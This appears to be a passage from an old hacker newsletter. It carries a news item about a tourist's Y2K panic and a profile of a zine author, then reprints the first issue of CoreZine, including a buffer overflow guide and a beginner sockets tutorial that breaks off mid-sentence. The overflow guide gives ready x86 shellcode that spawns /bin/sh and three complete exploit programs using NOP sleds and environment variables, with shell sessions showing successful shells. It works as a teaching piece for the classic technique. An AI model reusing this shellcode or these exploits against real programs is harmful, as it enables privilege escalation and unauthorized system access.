roadhouse 2334km north of Perth. He arrived carrying a SAS basic
remote survival book, a gas mask, dehydrated food items, a canteen,
water purifying tablets and camping gear. He had tried to enter the
country with a flak jacket and a blow gun but those where confiscated
by customs officials.
Fairfax IT
http://www.it.fairfax.com.au/breaking/20000330/A39581-2000Mar30.html
----------
Japanese tourist survives Y2K test hiccup 14:40 Thursday 30 March 2000 AAP
STAFF at a remote outback roadhouse in Western Australia revealed today
how a Japanese tourist turned up on their doorstep equipped with a flak
jacket and gas mask, fearing the Y2K bug would trigger a nuclear
explosion.
The terrified tourist had travelled to Australia, believing the world
would be plunged into chaos as it entered the new millennium.
Customs officials revealed yesterday how they stopped the man at
immigration carrying a survival kit, a blow gun and a chemical warfare
outfit.
And in the latest development in the incredible saga, outback residents
told today how the man feared Armageddon had arrived, when a routine
generator check on New Year's Eve caused a blackout.
Lisa Williams, who works at the Willare Bridge roadhouse 2334km north of
Perth, said the man "freaked out'' when the generators cut out at about
10pm on 31 December, resulting in a four-minute power blackout.
"He was running around going 'Y2K, Y2K', he was really panic-stricken,''
Williams said.
She said the man's English was poor and nobody was able to make him
understand what was happening.
It was not until roadhouse manager Graeme McNamara telephoned a Japanese
interpreter in Broome, who then spoke to the terrified tourist, that he
calmed down.
"She explained to him that no bombs were going to be falling and that
there wasn't going to be a nuclear holocaust, it was just the generators
being changed,'' Williams said.
He told them he believed the millennium bug would trigger a nuclear
explosion and he planned to head for the outback because he thought it
would be the safest place to be.
When he arrived in Australia, his flak jacket and the blow gun and darts,
illegal in Australia, were confiscated by customs officials, it emerged
yesterday.
But the man was allowed to enter the country with the other items, which
included an SAS basic remote survival book, a gas mask, dehydrated food,
an army style water container, water purifying tablets and camping gear.
Williams said she had tried to show the man the roadhouse's computer
console was still working after the power was restored to reassure him
that the millennium bug had not eventuated.
"I was pointing to the computer and trying to explain to him but he was
still in a state about it until he spoke to the interpreter,'' she said.
Roadhouse co-manager Sheree Marich said the man, dressed in army-style
camouflage gear, had arrived at the roadhouse earlier that afternoon by
taxi from Broome, a 165km trip for which he paid about $300.
"I didn't understand why the taxi driver had dropped him off to us at
first,'' Marich said.
"I actually thought he was a bit of a callous bastard who'd taken his
money and dumped him in the middle of nowhere.''
She said it was only later that she learned that the man had researched
the area and had asked to be taken there because of its remoteness.
The man left Australia, content that the world had not come to an end,
after enjoying a restful holiday.
@HWA
156.0 CoreZine: New zine by lamagra of b0f
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Submitted by: Ed
Site; http://corezine.seKure.de/
Owner: lamagra
This zine first came out in July of 1999, three issues have been released
at the url above with a fourth in the works, sadly you won't see it or any
further releases as lamagra has decided not to continue the project.
I highly recommend that you grab these while you can lest they disappear
off the net, they contain high quality tech papers but proved to be too much
work for one guy. Lack of advertising and a good plan also contributed to
the demise of this zine and little or no response therefore materialized
from a would-be audience.
The first issue is included here as an example of the quality of this zine
check it out and grab the others while you can. - Ed
----------------[ Personal
Handle: lamagra
Call him: lamagra, lama, lam
Past handles: access-granted
Handle origin: Blade (the movie)
Date of Birth: 28-12-1981
Height: 185 cm
Weight: uhmm, dunno
Eye color: green-gray
Hair Color: blonde
Computers: i586 (120 Mhz) & i486 & i486 (laptop)
Admin of: UNAH16, my network
Sites Frequented: www.securityfocus.com
URLs: http://bounce.to/unah16
Email: access-granted@geocities.com
----------------[ Favorite Things
Women: hmmm, yeah
Cars: cabrio's
Foods: all
Music: Hard-Core
Computers: yeah
Movies: all action and horror and *yeah*
Comics: no
Books: scientific books
Magazines: corezine, b4b0
TV: friends
Quotes: join the army, meet intresting people, kill them
People: peter, bea, an, psionic, A grue, grimknight, etc.
Misc:
Turn Ons: belly button peercing
Turn Offs: ignorance
lamagra can be found on EFnet in #b0f ...
COREZINE - faq
~~~~~~~~~~~~~~~~~
FAQ:
Q: Why did i start corezine?
A: Mainly because i want to help spread the knowledge. I like to get into new things, but sometimes there's just no info about it anywhere. Then you'll have to look at the source (read: linux kernel), but this is
way over the heads of some people. Nobody likes to look in that big piece of code, so they'll just say "nah, nevermind. I'll go do something else". Basicly i want to save people from all this trouble. If you need
help, mail me. Don't waste time in lame channels on IRC packed with people who don't want to help or can't help (#coders, #linux).
COREZINE - sample issue
~~~~~~~~~~~~~~~~~~~~~~~
First release July 1999
_____ _______
/ __ \ |___ (_)
| / \/ ___ _ __ ___ / / _ _ __ ___
| | / _ \| '__/ _ \ / / | | '_ \ / _ \
| \__/\ (_) | | | __/./ /__| | | | | __/
\____/\___/|_| \___|\_____/_|_| |_|\___|
------[ Corezine volume 01 - Juli 1999
Corezine #01
==================
--------[ info
This is the first release of our brand new ezine. Since it's the first
one, it's not really fantastic. We put it together in a week.
But next time (i prommis) i'll be huge and fantastic. By then i hope to have
finished my "ulimate backdoor", which i will release then.
Psionic is working on a new and bigger tutor on installing linux.
Everyone should have linux or BSD. We hope to get a lot of readermail and
other responses. You can mail us at .
If you want to encrypt your mail, i've added a PGP-key at the bottom of
this text.
REMEMBER: Big Brother is watching.
BTW: i've added extract.c to easily extract the programs included in this
ezine. I didn't make it myself, you could say i ripped from phrack.
But it's not, i just have a lot of stuff to do.
The program uses the <++> and <--> tags, they aren't part of the
texts or programs.
--------[ table of contents
1. introduction by corestaff
2. worldnews by peak
3. guide on bufferoverflows by lamagra
4. tutorial on sockets by xphantom
5. guide on file permissions by lamagra
6. an introduction to perl by darkmo0n
7. art of backdoors by meb
8. tutorial on installing linux by psionic
K 9. hyperterminal trick in windows by burntash
10. an introduction to C by psylence
11. a guide on finding holes (in addition to the first text) 17 K
142 K
--------[ Warez
extract.c: see above Phrack
lkm.tgz: my kernel module lamagra
Corestaff signing off.
<++> corezine.pgp
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use
mQGiBDeUjooRBAD/e8RiD1lNRhol32QTse2+fDad6r6IzWK01VSvaOOIwqgjAwPD
BShcGR2wU3kQ/Y/yT+aW1tmkVThG1k56jryrifu8P6s5EwoRMuFAjmXx9S4s7Px9
EpD7QJ6e8Ha8nX5oMkzo4lwVg6iJeXBpEsv0fi4JosvfbOvY3A82VGsAvwCg/82F
SdZ643ctQpeMpX/LelsR7CMEAJ05F/nwDej7orSdqae5OcAXCcW9TbqcLAbOzQZZ
QvnZePPN6QvCgc/X5bnGuU42YaY883b4jps3fnyMVWe5qR0UHqDq5zxBy1xyEq3I
ip4q2sLqwiReCTI+eBt7fAjaUlLTtdS/cEQMy5ERQhZWr+Q8ZxELzSjky7eVuciG
ZNK7A/sFbZVVfpgT0edCyOPkhsIuxctcQENLZ8kRy2S1I68388dN5hVLGtPXn1b+
QfbwtQBX/sowyU0bkR9PQy6I1K8GvhX49Wo+q0ZXRIjt92oU4ioqnRpsc5buRMUc
z5UjGTSxTIgIWiYFSdLOSTmNAAQvrj1sjWpm9tSuHA2YBBtErrQGdW5haDE2iQBL
BBARAgALBQI3lI6KBAsDAQIACgkQ+xtU4W2kapHbWQCbBbg8mc5PCZE1Z5HPEoO/
la29WnMAoLryW301F92f526TkE6iQSFO/X1OuQENBDeUjqkQBADHnvWOGb1qX8dV
YIGuZJGtAJLHvx1VNMM/C786eHLtl+MwHDl0OpJEIKM7cfT/lQmlmGuMTXvthlP/
qLaALC6G3StdVmRwqU+sXzpe97OPps5xsOS2bxESqgZYO7g6IwPQE31/xe0Qfzmz
uikuamnJF6YtOlD1qrFoaGvIggpYZwACAgP+IiVjaYBvckuHDI73gd1kC+D+aS2C
JQKQ1IxUxwJzOqw3ExVP0qDEJL1WpASB4FYe2QRHEDIHLn1Xn8RC0KnbZmbTE0sP
IJqjCENY2i2T+l0NNc0UCsjlzcv6xLt+JpDUI/9NpFFEfioZuUIAMDkoIaoVCgkw
r1zN67AlbaV0REKJAD8DBRg3lI6p+xtU4W2kapERAryEAJ97NQp4ANiB7uh3Ine3
MchIHoPSowCfWM6n0+bnd7njmGvOg+KdOQxtcQI=
=xS9u
-----END PGP PUBLIC KEY BLOCK-----
<-->
-----------------------[ BUFFEROVERFLOWS
by Lamagra buffer/example.c
void main()
{
char big_string[100];
char small_string[50];
memset(big_string,0x41,100);
/* strcpy(char *to,char *from) */
strcpy(small_string,big_string);
}
<--> end of example.c
The program creates two strings, memset() files the big_strings with
char 0x41 (= A). Then it copies the big_string into the small_string.
As we all see the small_string can't hold 100 chars and a bufferoverflow
follows.
Let's take a look at the memory:
[ big_string ] [ small_string ] [SFP] [RET]
During the bufferoverflow the SFP (Stack Frame Pointer) and the RET will
be overwritten by A's. This means that the RET will now be 0x41414141
(0x41 is the hex value of A). When the function returns, the IP will be
replaced by the overwritten RET. Then the computer will try to execute
the instruction at 0x41414141. This will result in a segmentation violation
because this address is outside the process space.
--------------------[ Exploitation
Now that we know we can change the flow of the program by overwriting the RET,
we can try to exploit it. Instead of overwriting with A's, we could
overwrite it with a specific address.
------------[ Execution of arbitrary code
Now we need something to point the address to and execute. In most cases
we'll just spawn a shell, although this is not the only thing we can do.
Before:
FFFFF BBBBBBBBBBBBBBBBBBBBB EEEE RRRR FFFFFFFFFF
B = the buffer
E = stack frame pointer
R = return address
F = other data
After:
FFFFF SSSSSSSSSSSSSSSSSSSSSSSSSAAAAAAAAFFFFFFFFF
S = shellcode
A = address pointing to the shellcode
F = other data
The code to spawn a shell in C looks like this:
<++> buffer/shell.c
void main(){
char *name[2];
name[0] = "/bin/sh";
name[1] = 0x0;
execve(name[0], name, 0x0);
exit(0);
}
<--> end of shellcode
I'm not going to explain how to produce shellcode because this will require a
lot of knowledge in ASM. It's a long and boring process that we don't need to
get into because there is more than enough shellcode available.
For those who want to learn how to make it:
- compile the program above using the -static flag
- open it up in gdb, use the "disassemble main" command
- take all the unnecessary code
- change and rewrite it, this time in ASM
- compile, open it up in gdb and use the "disassemble main" command
- use the x/bx command on the addresses of the instructions
and retrieve the hex-code.
XXXXXXXXXXX
X WAKE UP X
XXXXXXXXXXX
Or you can just take this code
char shellcode[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
------------[ Finding the address
When we try to overflow a buffer of an another program, the problem is finding
the address of the buffer. The answer to this problem is that for every program
the stack starts at the same address. Therefore by knowing where the stack
starts we can try to guess the address of the buffer.
This program will give us its stack pointer:
<++> buffer/getsp.c
unsigned long get_sp(void){
__asm__("movl %esp, %eax);
}
void main(){
fprintf(stdout,"0x%x\n",get_sp());
}
<--> end of getsp.c
------------[ Trying to exploit an example
We're going to try to exploit this program:
<++> buffer/hole.c
void main(int argc,char **argv[]){
char buffer[512];
if (argc > 1) /* otherwise we crash our little program */
strcpy(buffer,argv[1]);
}
<--> end of hole.c
<++> buffer/exploit1.c
#include
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[])
{
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr += 4;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
memcpy(buff,"BUF=",4);
putenv(buff);
system("/bin/bash");
}
<--> end of exploit1.c
Now we can try to guess the offset (bufferaddress = stackpointer + offset).
[bubbles]$ exploit1 600
Using address: 0xbffff6c3
[bubbles]$ ./hole $BUF
[bubbles]$ exploit1 600 100
Using address: 0xbffffce6
[bubbles]$ ./hole $BUF
segmentation fault
etc.
etc.
As you see this process is nearly impossible, we have to guess the exact address
of the buffer. To increase our chances, we can pad NOP's before the shellcode
in our overflow buffer. The NOP instruction is used to delay execution.
We use it because then we don't need the guess the exact address of the buffer.
If the overwritten return address points inside the NOPstring. Our code will be
executed seconds later.
The memory should look like this:
FFFFF NNNNNNNNNNNSSSSSSSSSSSSSSAAAAAAAAFFFFFFFFF
N = NOP
S = shellcode
A = address pointing to the shellcode
F = other data
We rewrite our old exploit.
<++> buffer/exploit2.c
#include
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[])
{
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
memcpy(buff,"BUF=",4);
putenv(buff);
system("/bin/bash");
}
<--> end of exploit2.c
[bubbles]$ exploit2 600
Using address: 0xbffff6c3
[bubbles]$ ./hole $BUF
segmentation fault
[bubbles]$ exploit2 600 100
Using address: 0xbffffce6
[bubbles]$ ./hole $BUF
#exit
[bubbles]$
To improve our exploit even more, we could place the shellcode inside an
environment variable. Then we could overflow the buffer with the address of this
variable. This method will increase our chances even more.
We modify our code so it uses the setenv() call to put the shellcode in the environment.
<++> buffer/exploit3.c
#include
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[])
{
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_esp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"BUF=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("/bin/bash");
}
end of exploit3.c
[bubbles]$ exploit2 600
Using address: 0xbffff5d7
[bubbles]$ ./hole $RET
#exit
[bubbles]$
--------------------[ Finding bufferoverflows
There is really only one way to find bufferoverflows, and that is by reading the
source. Since Linux is an open-source system, it will be easy to obtain the source
of the programs. Long live open-source.
Look for library functions that don't preform boundary checking like:
strcpy(), strcat(), sprintf(), vsprintf(), scanf().
Other dangerous ones are:
getc() and getchar() put in a while loop.
misuse of strncat.
--------------------[ Other refrences
Smashing the stack for fun and profit by aleph1
bufferoverflows by mudge
--------------------[ Ending
Well that about wraps it up, i hope you learned something and enjoyed reading this guide.
I enjoyed writing it.
If you any further questions, remarks or anything, you can find me on IRC
(irc.box5.net) in some channel.
--------------------[ EOF
=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
The *beginners* guide to sockets in C
By: xphantom
=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
So, you want to connect to other computers from within your own programs
you say? You can't find any info on the net to teach you how to do so? You
have no idea what man pages to look up? You can't find/afford any books?
Well, you came to the right place. In this paper I hope to give a jump
start into programming your own Internet applications in C. This paper
does assume at least *some* familiarity with C and it's syntax, and also
that you are using some form of UNIX or Linux (from now on referred to as
*nix), although large parts of programming sockets in *nix is the same as
in Windows, there are some differences which I won't get into (because I don't
program in windows ;)). It should also be noted that all code contained
in this paper was written and compiled on a Red Hat 5.2 system using
glibc 2.0.7 and libc 5.3.12 and it all compiled fine. Now, lets get on
with the show shall we.
To a programmer, sockets are very similar to a low level file descriptor
(you can even use the read() and write() functions with your sockets)
although creating the socket itself is more involved than opening, reading
and writing to files due to the additional complexity of creating network
connection compared to reading and writing from your own hard drive.
For most socket use, you will need a client, server pair. The server job
is to listen on a specified port and perform some action when it receives
a request from the client, while the clients job (obviously) is to "ask"
the server to perform whatever task(s) it was programmed to do.
We won't be using *every* socket type function in this paper since it is a
beginner's tutorial, but there will be enough information to get you up and
running and (hopefully) having some fun. With that said, let's make some
sockets.
=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
Creating a socket with: socket()
The first thing you need to do to write your socket program is (of course)
create a socket, using the socket() function:
-------
#include
#include
int socket(int af, int type, int protocol)
------
'int af' is the address family or domain the socket is part of. The two
most common are:
AF_UNIX - Used for interprocess communication on a single machine.
AF_INET - Used for interprocess communication on the same, or
different systems using the DARPA protocols (UDP/TCP/IP).
'int type' is what type of connection you'll be using, the two most common
are:
SOCK_STREAM - Used for connection oriented sockets, guaranteed data
delivery, or an error will be received by the sender.
SOCK_DGRAM - Used for connection less sockets, data delivery not
guaranteed.
In this paper we will focus on family AF_INET and type SOCK_STREAM.
'int protocol' A protocol value of 0 is very common. This permits the
system to choose the first protocol which is permitted with the pair of
values specified for family and type.
On success, a file descriptor is returned, on failure -1 is returned and
errno is set accordingly. E.G:
------
#include
#include
int sockfd /* soon to be socket file descriptor */
sockfd = socket(AF_INET, SOCK_STREAM, 0)
/* error checking here */
------
And if all goes well, we now have a socket file descriptor that we can use
across the Internet (AF_INET) using a connection based protocol
(SOCK_STREAM) Remember, the protocol (0) is automatically set for us.
=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
Giving your socket a name using: bind()
Ok, now we have our socket created. The next thing is we need to do something with it.
Lets try giving it a name using bind():
------
#include
#include
int bind(int sockfd, struct sockaddr *name, int namelen)
------
In a call to bind(), sockfd is the file descriptor for the socket, obtained
from the call to socket(). Name is a pointer to a structure of type sockaddr.
If the address family is AF_UNIX (as specified when the socket is created),
the structure is defined as follows:
------
struct sockaddr {
u_short sa_family;
char sa_data[14];
};
------
name.sa_family should be AF_UNIX. name.sa_data should contain up to 14
bytes of a file name which will be assigned to the socket. namelen gives
the actual length of name, that is, the length of the initialized contents
of the data structure. E.G:
------
#include
#include
struct sockaddr name;
int sockfd;
name.sa_family = AF_UNIX;
strcpy(name.sa_data, "/tmp/whatever");
sockfd = socket(AF_UNIX, SOCK_STREAM, 0)
/* error checking code here */
bind(s, &name, strlen(name.sa_data) + sizeof(name.sa_family)
/* error checking code here */
------
error checking note: on success bind() returns 0, on failure bind() returns
-1 and sets errno accordingly.
Now, in a call to bind using AF_INET we could use a different structure:
-----
struct sockaddr_in {
short int sin_family; /* Address family */
unsigned short int sin_port; /* Port number */
struct in_addr sin_addr; /* Internet address */
unsigned char sin_zero[8]; /* Same size as struct sockaddr */
};
------
This is bit bigger and more involved but isn't to hard at all. Lets look
at an example:
------
#include
#include
#include
#include
int sockfd, port = 23;
struct sockaddr_in my_addr;
if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("Socket Error, %d\n", errno);
exit(1);
}
my_addr.sin_family = AF_INET; /* host byte order */
my_addr.sin_port = htons(port); /* see man htons for more information */
my_addr.sin_addr.s_addr = htonl(INADDR_ANY); /* get our address */
bzero(&(my_addr.sin_zero), 8); /* zero out the rest of the space */
if((bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1)
{
printf("Bind Error, %d\n", errno);
close(sockfd);
exit(1);
}
------
There you go, if all went well, our socket now has a name, and if all
didn't go well, the error was reported and the program exited.
A few small notes - if all your program does is connect to other computers,
you don't need to use the bind() function at all (although it won't hurt
anything). The line: my_addr.sin_port = htons(port); can be automated to
get it's own port by just setting the port to 0, good for client programs,
bad for server programs as you don't know what port it's using.
Now we have a socket, it's named, but it still doesn't do anything, that's
not good...lets see if we can connect to another computer.
=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
Remote connections using: connect()
If you want to connect to a remote machine, there's no getting around
using the connect() function:
------
#include
#include
int connect(int sockfd, struct sockaddr *serv_addr, int addrlen);
------
sockfd is our friendly socket file descriptor returned from out call to socket()
serv_addr is a struct sockaddr containing the destination port and IP address
addrlen can be set to sizeof(struck sockaddr)
Lets have another example:
------
#include
#include
#include
#define DEST_IP "132.241.5.10"
#define DEST_PORT 23
main()
{
int sockfd;
struct sockaddr_in dest_addr; /* will hold the destination addr */
sockfd = socket(AF_INET, SOCK_STREAM, 0); /* do some error checking! */
dest_addr.sin_family = AF_INET; /* host byte order */
dest_addr.sin_port = htons(DEST_PORT); /* short, network byte order */
dest_addr.sin_addr.s_addr = inet_addr(DEST_IP);
bzero(&(dest_addr.sin_zero), 8); /* zero the rest of the struct */
connect(sockfd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr));
/* error checking code here */
/* more code
.
.
.
*/
}
------
Again, connect() returns 0 on success, -1 on error and sets errno
You may have noticed the lack of a call to bind() because we don't care what
port we connect from, in a case like this the only port that matter is the
one we're connecting to.
=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
Listening for calls using: listen()
Let's say we want to make a server program of some sort, we need some way
to listen for incoming connections don't we, lets see if the listen()
function works (it just might ya know ;))
------
#include
#include
int listen(int sockfd, int backlog);
------
sockfd again is our socket file descriptor
backlog is how many connection we'll take at once
Again, as usual, listen() returns -1 and sets errno on error.
Now in this case we will need to call bind() before we call listen() (we
want a regular port for people to connect to instead of making them guess)
Our function order so far would be:
------
socket(); /* to create out socket file descriptor */
bind(); /* to give our socket a name */
listen(); /* listen for connection */
------
=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
Taking the connection using: accept()
Ok, this is where the...uhm...fun begins. Someone tries to connect to a
port you happen to be listening on, you need to accept that connection
now and accept() will do just that (who knew? ;))
------
#include
#include
int accept(int sockfd, void *addr, int *addrlen);
------
Again, sockfd is out friendly socket file descriptor
addr is usually going to a pointer to a struct, struct sockaddr_in
addrlen will be set to: sizeof(struct sockaddr_in)
Can you guess what gets returned on error?...you got it...-1 and errno
gets set. E.G:
------
#include
#include
#include
#define MYPORT 1500 /* the port users will be connecting to */
#define BACKLOG 5 /* how many pending connections queue will hold */
main()
{
int sockfd, new_fd; /* listen on sock_fd, new connection on new_fd */
struct sockaddr_in my_addr; /* my address information */
struct sockaddr_in their_addr; /* connector's address information */
int sin_size;
sockfd = socket(AF_INET, SOCK_STREAM, 0); /* do some error checking! */
my_addr.sin_family = AF_INET; /* host byte order */
my_addr.sin_port = htons(MYPORT); /* short, network byte order */
my_addr.sin_addr.s_addr = INADDR_ANY; /* auto-fill with my IP */
bzero(&(my_addr.sin_zero), 8); /* zero the rest of the struct */
/* did you remember your error checking? */
bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr));
listen(sockfd, BACKLOG);
sin_size = sizeof(struct sockaddr_in);
new_fd = accept(sockfd, &their_addr, &sin_size);
------
Note that we will use the socket descriptor new_fd for all send() and
recv() calls. If you're only getting one single connection, you can
close() the original sockfd in order to prevent more incoming connections
on the same port, if you so desire.
=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
I think we need to talk: send() and recv()
Now, we've created a socket, given it a name, listened for and accepted a
connection, it's finally time to exchange information with send() and
recv():
------
#include
#include
int send(int sockfd, const void *msg, int len, int flags);
int recv(int sockfd, void *buf, int len, unsigned int flags);
------
send():
sockfd - socket file descriptor
msg - message to send
len - size of message to send
flags - read 'man send' for more info, set it to 0 for now :)
recv():
sockfd - socket file descriptor
buf - data to receive
len - size of buf
flags - same as flags in send()
send() example:
------
char *msg = "Hey there people";
int len, send_msg;
/* code to create(), bind(), listen() and accept() */
len = strlen(msg);
bytes_sent = send(sockfd, msg, len, 0);
------
recv() example:
------
char *buf;
int len, recv_msg;
/* code to create(), bind(), listen() and accept() */
len = strlen(buf);
recv_msg = recv(sockfd, buf, len, 0);
------
And again, both send() and recv() return -1 on error and set errno.
If you're using type SOCK_DGRAM you use the sendto() and recvfrom()
functions for sending and receiving data
=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
Nice talking to you: close() and shutdown()
Once you're finished exchanging data, it's time to close the connection by
simply closing the socket:
------
#include
/* all you code */
close(sockfd);
------
Pretty easy eh? If you want a bit more control over how the connection
gets closed you can use the shutdown() function:
------
int shutdown(int sockfd, int how)
------
There are three different values for how:
1 - no more revc()'s allowed
2 - no more sends are allowed
3 - no more send()'s or recv()'s allowed (same as close())
It's easy as that. You have now created a socket, given it a name, listened
for connections, accepted connections, connected to other computers and
closed the socket, not bad for a days work eh?
=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
Who are you: getpeerbyname()
So you want to know who it is that's connecting to you? Well you're in luck!
There just so happens to be a function for just that purpose:
------
#include
int getpeername(int sockfd, struct sockaddr *addr, int *addrlen);
------
sockfd - our friendly socket file descriptor rears it's ugly head again
addr - a pointer to either 'struct sockaddr' or 'struct sockaddr_in'
addrlen - should be made to: sizeof(struct sockaddr)
My oh my, getpeerbyname() also returns -1 on error, who would have guessed?
If this call worked right, you now have the person's address and can use
inet_ntoa() or gethostbyaddr() to print more info, not their login name
though unless their running identd but that's beyond what we're talking
about here. Read RFC 1413 for more information on that.
=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
Who am I: gethostname()
Ok, getpeerbyname() was easy, well, gethostame() is easier.
------
#include
int gethostname(char *hostname, size_t size);
------
hostname - an array of type char that will hold the host name on return
size - size of the above mentioned array
This returns the name of the computer your program is running on and can
then be used with gethostbyname() to print out your IP address. Again, -1
on error and sets errno.
=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
What's your IP?
Well, lets put that information to use ok? We'll make our first, full
fledged program, a DNS program. DNS or "Domain Name Service" is a way of
getting a machines IP address by using it's "human-readable" address.
Have you ever telneted to a machine and saw:
$ telnet microsoft.com
Trying 206.163.24.176 (not the real address but I'm too lazy to try :))
Well guess what, the first thing the telnet program did was do a DNS check
on microsoft.com so it could find the IP. Now, to do this well be using
the function gethostbyname() which can be found in netdb.h
------
#include
struct hostent *gethostbyname(const char *name);
------
By looking at that you see it uses a structure called 'struct hostent'
which looks like:
------
struct hostent {
char *h_name;
char **h_aliases;
int h_addrtype;
int h_length;
char **h_addr_list;
};
#define h_addr h_addr_list[0]
------
This structure breaks down to:
h_name - Official name of host
h_aliases - A NULL-terminated array of alternate names for the host.
h_addrtype - The type of address being returned; usually AF_INET.
h_length - The length of the address in bytes.
h_addr_list - A zero-terminated array of network addresses for the host.
Host addresses are in Network Byte Order.
h_addr - The first address in h_addr_list
gethostbyname() returns a pointer to the filled struct hostent, or NULL on
error. (But errno is not set--h_errno is set instead. See 'man herror' for
more help) Now lets make our DNS program
------
#include
#include
#include
#include
#include
#include
int main(int argc, char *argv[])
{
struct hostent *h;
if (argc != 2) { /* error checking on the command line */
fprintf(stderr,"Usage: getip \n");
exit(1);
}
if ((h=gethostbyname(argv[1])) == NULL) { /* get the host info */
herror("gethostbyname");
exit(1);
}
printf("Host name : %s\n", h->h_name);
printf("IP Address : %s\n",inet_ntoa(*((struct in_addr *)h->h_addr)));
return 0;
}
------
And there you go, small and easy, just the way we like it, compile it
with: gcc -o getip getip.c (assuming you saved it as getip.c :))
=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
Client and Server programs
Ok, lets end this discussion with a small, and somewhat pointless,
client-server application. The only purpose of this is for a user to
connect to the server, receive a predefined string, then disconnect, but
it should get the point across, I'll leave making it more useful as a job
